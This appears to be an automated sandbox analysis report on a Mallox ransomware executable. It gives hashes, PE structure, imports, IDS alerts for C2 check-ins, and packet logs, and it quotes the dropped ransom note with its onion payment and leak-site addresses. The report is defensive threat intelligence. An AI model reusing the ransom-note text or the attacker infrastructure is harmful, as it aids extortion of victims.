                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):6.513355105427463
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:malware.exe
                        File size:146'944 bytes
                        MD5:99bfaaacebf1b34fdebd4e7ce4070a36
                        SHA1:2e4080a5a71ad5030b9cab6e1465a5777ea57cf2
                        SHA256:c0e35b19f97021416e3724006511afc95d6aa409404e812d8c62b955bc917d3c
                        SHA512:899e0ee99ebc0a27cdb499cbce6e0190d6af260c35c54456c55dcf2b5ce9cdef78f6d8d85ed3ecaf618c282d2eb47cd1b2433d915480ccf9e5c39de9ba0d8bad
                        SSDEEP:3072:JpcKbMfUcJItoKrBLbsdKIQD8i4WT7BTxvrSa6wKKmhgsLSLonChYgV:Jpc7UcJImWLGKIFKpT8KdaCegV
                        TLSH:D9E37C527AD2C471E2B70E301974DAA25A3EFC314F61AA5B63A4026E9F305D0ED31E77
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l!a.(@..(@..(@..M&.."@..M&...@...*...@...*..9@...*..<@..M&..)@..M&..;@..M&..;@..(@...@..\+..%@..\+..)@..\+..)@..Rich(@.........

                        File Icon

                        Icon Hash:90cececece8e8eb0

                        Static PE Info

                        General

                        Entrypoint:0x4091f0
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Time Stamp:0x643EAD88 [Tue Apr 18 14:47:36 2023 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:ef6afd25026ed6e85998a22ffa00fbd2

                        Entrypoint Preview

                        Instruction
                        call 00007F616D13CB4Eh
                        jmp 00007F616D13C45Fh
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F616D13C63Dh
                        mov dword ptr [esi], 00419430h
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 00419438h
                        mov dword ptr [ecx], 00419430h
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        push dword ptr [ebp+08h]
                        mov esi, ecx
                        call 00007F616D13C60Ah
                        mov dword ptr [esi], 0041944Ch
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        and dword ptr [ecx+04h], 00000000h
                        mov eax, ecx
                        and dword ptr [ecx+08h], 00000000h
                        mov dword ptr [ecx+04h], 00419454h
                        mov dword ptr [ecx], 0041944Ch
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 00419410h
                        and dword ptr [eax], 00000000h
                        and dword ptr [eax+04h], 00000000h
                        push eax
                        mov eax, dword ptr [ebp+08h]
                        add eax, 04h
                        push eax
                        call 00007F616D13D370h
                        pop ecx
                        pop ecx
                        mov eax, esi
                        pop esi
                        pop ebp
                        retn 0004h
                        lea eax, dword ptr [ecx+04h]
                        mov dword ptr [ecx], 00419410h
                        push eax
                        call 00007F616D13D3BBh
                        pop ecx
                        ret
                        push ebp
                        mov ebp, esp
                        push esi
                        mov esi, ecx
                        lea eax, dword ptr [esi+04h]
                        mov dword ptr [esi], 00419410h
                        push eax
                        call 00007F616D13D3A4h
                        test byte ptr [ebp+08h], 00000001h
                        pop ecx

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2151c0xc8.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x280000x1e0.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x290000x17c0.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x205400x38.rdata
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x2061c0x18.rdata
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x205780x40.rdata
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x190000x2cc.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x179840x17a00c08d015704b9619ecb7408ae4b4e5dc1False0.5989893353174603data6.690193304423013IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x190000x95400x960040aa7cce1907c5761b7ad902500fddf8False0.4109114583333333data4.925973924595098IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x230000x4b580x1000b314c6b468f17c56a38ad2a1f4b93053False0.22412109375DOS executable (block device driver \277DN\346@\273)3.947260288287349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x280000x1e00x200d627f7af930e6cd2da2b7ca8805a23d8False0.52734375data4.7122981932940915IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x290000x17c00x180058d36c3653754bc3b77777b521bba79bFalse0.8107096354166666data6.621781703147149IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_MANIFEST0x280600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                        Imports

                        DLLImport
                        KERNEL32.dllGetModuleHandleA, GetLocaleInfoA, OpenProcess, PostQueuedCompletionStatus, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, Process32NextW, CreateFileA, GetDiskFreeSpaceExW, GetCurrentThread, TerminateThread, LoadLibraryA, lstrcatW, CloseHandle, GetNativeSystemInfo, GetSystemInfo, CreateThread, GetWindowsDirectoryA, GetWindowsDirectoryW, GetProcAddress, SetFilePointerEx, LocalFree, DeleteCriticalSection, ExitProcess, GetCurrentProcessId, GetModuleHandleW, CopyFileW, WideCharToMultiByte, lstrcpyW, SleepEx, GetDiskFreeSpaceExA, lstrcmpiW, CreateIoCompletionPort, GetTickCount, lstrcmpW, GetCurrentThreadId, GetDriveTypeW, GetFileTime, GetComputerNameA, QueryDosDeviceW, FindFirstVolumeW, DuplicateHandle, CreateEventW, SetEvent, FindVolumeClose, GetVolumePathNamesForVolumeNameW, GetFileType, FindNextVolumeW, WriteConsoleW, SetEndOfFile, ReadConsoleW, HeapSize, GetConsoleMode, GetConsoleCP, GetFileAttributesW, CreateFileW, WaitForSingleObject, FindClose, lstrlenA, GetQueuedCompletionStatus, SetErrorMode, InitializeCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleFileNameW, GetUserDefaultLangID, TerminateProcess, WriteFile, lstrlenW, GetCurrentProcess, FindNextFileW, GetCommandLineW, EnterCriticalSection, FindFirstFileExW, GetFileSizeEx, GetLogicalDrives, GetVolumeInformationW, ReadFile, FlushFileBuffers, GetStringTypeW, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, QueryPerformanceCounter, MoveFileW, LCMapStringW, HeapAlloc, HeapFree, HeapReAlloc, GetStdHandle, GetModuleHandleExW, LoadLibraryExW, FreeLibrary, TlsFree, TlsSetValue, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, ResetEvent, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, SetLastError, EncodePointer, TlsAlloc, TlsGetValue, DecodePointer
                        USER32.dllCreateWindowExW, GetCursorPos, DefWindowProcW, RegisterClassW
                        ADVAPI32.dllCryptGenRandom, OpenThreadToken, LookupPrivilegeValueW, AdjustTokenPrivileges, CreateServiceW, RegCloseKey, CryptAcquireContextW, CloseServiceHandle, RegQueryValueExA, OpenSCManagerW, AllocateAndInitializeSid, SetEntriesInAclW, SetNamedSecurityInfoW, RegSetValueExW, OpenProcessToken, FreeSid, StartServiceW, RegOpenKeyExA, RegOpenKeyExW, CryptReleaseContext
                        SHELL32.dllCommandLineToArgvW, ShellExecuteW, ShellExecuteA
                        NETAPI32.dllNetShareEnum, NetApiBufferFree
                        SHLWAPI.dllwnsprintfA, StrCmpNIW, StrCmpNW, StrDupW, StrStrIW, UrlUnescapeA, UrlEscapeA, SHDeleteKeyW, wnsprintfW
                        IPHLPAPI.DLLGetIpNetTable
                        WS2_32.dllinet_ntoa
                        WININET.dllInternetCrackUrlW, InternetQueryOptionW, InternetCloseHandle, InternetConnectW, InternetSetOptionW, InternetOpenW, InternetQueryDataAvailable, HttpOpenRequestW, InternetReadFile, HttpSendRequestW

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-12-07T12:40:59.562832+01002046826ET MALWARE Mallox Ransomware CnC Domain (whyers .io) in DNS Lookup1192.168.2.4555791.1.1.153UDP
                        2024-12-07T12:41:01.288018+01002046827ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI1192.168.2.44973313.248.169.48443TCP
                        2024-12-07T12:41:01.724541+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.44973313.248.169.48443TCP
                        2024-12-07T12:41:03.154741+01002046827ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI1192.168.2.44973413.248.169.48443TCP
                        2024-12-07T12:41:03.633622+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.44973413.248.169.48443TCP
                        2024-12-07T12:41:05.039651+01002046827ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI1192.168.2.44973813.248.169.48443TCP
                        2024-12-07T12:41:05.586290+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.44973813.248.169.48443TCP
                        2024-12-07T12:41:07.058485+01002046827ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI1192.168.2.44973913.248.169.48443TCP
                        2024-12-07T12:41:07.506995+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.44973913.248.169.48443TCP
                        2024-12-07T12:41:12.534758+01002046827ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI1192.168.2.44974013.248.169.48443TCP
                        2024-12-07T12:41:12.977306+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.44974013.248.169.48443TCP
                        2024-12-07T12:41:14.330007+01002046827ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI1192.168.2.44974213.248.169.48443TCP
                        2024-12-07T12:41:14.771895+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.44974213.248.169.48443TCP
                        2024-12-07T12:41:16.128235+01002046827ET MALWARE Observed Mallox Ransomware Domain (whyers .io) in TLS SNI1192.168.2.44974413.248.169.48443TCP
                        2024-12-07T12:41:16.568045+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.44974413.248.169.48443TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 7, 2024 12:40:58.133938074 CET4973280192.168.2.4172.67.74.152
                        Dec 7, 2024 12:40:58.253901958 CET8049732172.67.74.152192.168.2.4
                        Dec 7, 2024 12:40:58.253969908 CET4973280192.168.2.4172.67.74.152
                        Dec 7, 2024 12:40:58.254108906 CET4973280192.168.2.4172.67.74.152
                        Dec 7, 2024 12:40:58.373960018 CET8049732172.67.74.152192.168.2.4
                        Dec 7, 2024 12:40:59.349797964 CET8049732172.67.74.152192.168.2.4
                        Dec 7, 2024 12:40:59.349889994 CET4973280192.168.2.4172.67.74.152
                        Dec 7, 2024 12:40:59.877985954 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:40:59.878014088 CET4434973313.248.169.48192.168.2.4
                        Dec 7, 2024 12:40:59.878205061 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:00.051788092 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:00.051805019 CET4434973313.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:01.287945986 CET4434973313.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:01.288017988 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.360196114 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.360215902 CET4434973313.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:01.360481024 CET4434973313.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:01.360522032 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.384026051 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.431334019 CET4434973313.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:01.724337101 CET4434973313.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:01.724402905 CET4434973313.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:01.724421978 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.724539995 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.724755049 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.724806070 CET4434973313.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:01.724845886 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.724955082 CET49733443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.858419895 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.858459949 CET4434973413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:01.858522892 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.889101982 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:01.889117956 CET4434973413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:02.086611032 CET49737135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:03.092473030 CET49737135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:03.153422117 CET4434973413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:03.154741049 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.309420109 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.309437037 CET4434973413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:03.312282085 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.312289000 CET4434973413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:03.633636951 CET4434973413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:03.633688927 CET4434973413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:03.633702993 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.633733988 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.633788109 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.633804083 CET4434973413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:03.633812904 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.633845091 CET49734443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.785219908 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.785255909 CET4434973813.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:03.785538912 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.812463999 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:03.812484026 CET4434973813.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:05.039583921 CET4434973813.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:05.039650917 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.050508976 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.050518990 CET4434973813.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:05.264362097 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.264364004 CET49737135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:05.264399052 CET4434973813.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:05.586303949 CET4434973813.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:05.586352110 CET4434973813.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:05.586378098 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.586405993 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.589525938 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.589546919 CET4434973813.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:05.589556932 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.589592934 CET49738443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.829250097 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.829284906 CET4434973913.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:05.829360008 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.829596996 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:05.829607964 CET4434973913.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:07.058412075 CET4434973913.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:07.058485031 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:07.059683084 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:07.059691906 CET4434973913.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:07.184914112 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:07.184921026 CET4434973913.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:07.507003069 CET4434973913.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:07.507042885 CET4434973913.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:07.507064104 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:07.507078886 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:07.507220030 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:07.507231951 CET4434973913.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:07.507241011 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:07.507277012 CET49739443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:08.291243076 CET49740443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:08.291285038 CET4434974013.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:08.291344881 CET49740443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:08.292160034 CET49740443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:08.292174101 CET4434974013.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:09.264363050 CET49737135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:12.534703016 CET4434974013.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:12.534758091 CET49740443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:12.535486937 CET49740443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:12.535492897 CET4434974013.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:12.537183046 CET49740443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:12.537188053 CET4434974013.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:12.977320910 CET4434974013.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:12.977375031 CET4434974013.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:12.977432013 CET49740443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:12.977531910 CET49740443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:12.977547884 CET4434974013.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:13.098504066 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:13.098532915 CET4434974213.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:13.098604918 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:13.099107027 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:13.099118948 CET4434974213.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:14.329945087 CET4434974213.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:14.330007076 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.334317923 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.334326029 CET4434974213.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:14.335913897 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.335918903 CET4434974213.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:14.771910906 CET4434974213.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:14.771961927 CET4434974213.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:14.772001982 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.772001982 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.772069931 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.772089958 CET4434974213.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:14.772109032 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.772138119 CET49742443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.902489901 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.902517080 CET4434974413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:14.902590990 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.902841091 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:14.902852058 CET4434974413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:16.128182888 CET4434974413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:16.128235102 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:16.135150909 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:16.135159016 CET4434974413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:16.136703014 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:16.136708021 CET4434974413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:16.568058014 CET4434974413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:16.568109989 CET4434974413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:16.568113089 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:16.568152905 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:16.568211079 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:16.568223953 CET4434974413.248.169.48192.168.2.4
                        Dec 7, 2024 12:41:16.568233967 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:16.568270922 CET49744443192.168.2.413.248.169.48
                        Dec 7, 2024 12:41:17.264373064 CET49737135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:23.087760925 CET49749135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:24.076908112 CET49749135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:26.076898098 CET49749135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:30.076921940 CET49749135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:38.076927900 CET49749135192.168.2.4192.168.2.1
                        Dec 7, 2024 12:42:47.903685093 CET4973280192.168.2.4172.67.74.152
                        Dec 7, 2024 12:42:48.026223898 CET8049732172.67.74.152192.168.2.4
                        Dec 7, 2024 12:42:48.026304960 CET4973280192.168.2.4172.67.74.152

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 7, 2024 12:40:57.978534937 CET6481753192.168.2.41.1.1.1
                        Dec 7, 2024 12:40:58.115874052 CET53648171.1.1.1192.168.2.4
                        Dec 7, 2024 12:40:59.562832117 CET5557953192.168.2.41.1.1.1
                        Dec 7, 2024 12:40:59.700615883 CET53555791.1.1.1192.168.2.4
                        Dec 7, 2024 12:41:02.084141970 CET62330274192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:02.085022926 CET62330274192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:02.085943937 CET62330274192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:23.081197977 CET62330274192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:23.082262993 CET62330274192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:23.082879066 CET62330274192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:23.084638119 CET62330274192.168.2.4192.168.2.1
                        Dec 7, 2024 12:41:44.084814072 CET62330274192.168.2.4192.168.2.1
                        Dec 7, 2024 12:43:09.089010000 CET62330274192.168.2.4192.168.2.1

                        ICMP Packets

                        TimestampSource IPDest IPChecksumCodeType
                        Dec 7, 2024 12:41:02.084184885 CET192.168.2.1192.168.2.4830b(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:02.085028887 CET192.168.2.1192.168.2.4830b(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:02.085948944 CET192.168.2.1192.168.2.4830b(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:02.086648941 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:03.092495918 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:05.264399052 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:09.264395952 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:17.264414072 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:23.081238031 CET192.168.2.1192.168.2.48306(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:23.082269907 CET192.168.2.1192.168.2.48307(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:23.082885027 CET192.168.2.1192.168.2.48307(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:23.084642887 CET192.168.2.1192.168.2.48307(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:23.087804079 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:24.076935053 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:26.076934099 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:30.076956034 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
                        Dec 7, 2024 12:41:38.076968908 CET192.168.2.1192.168.2.48279(Port unreachable)Destination Unreachable
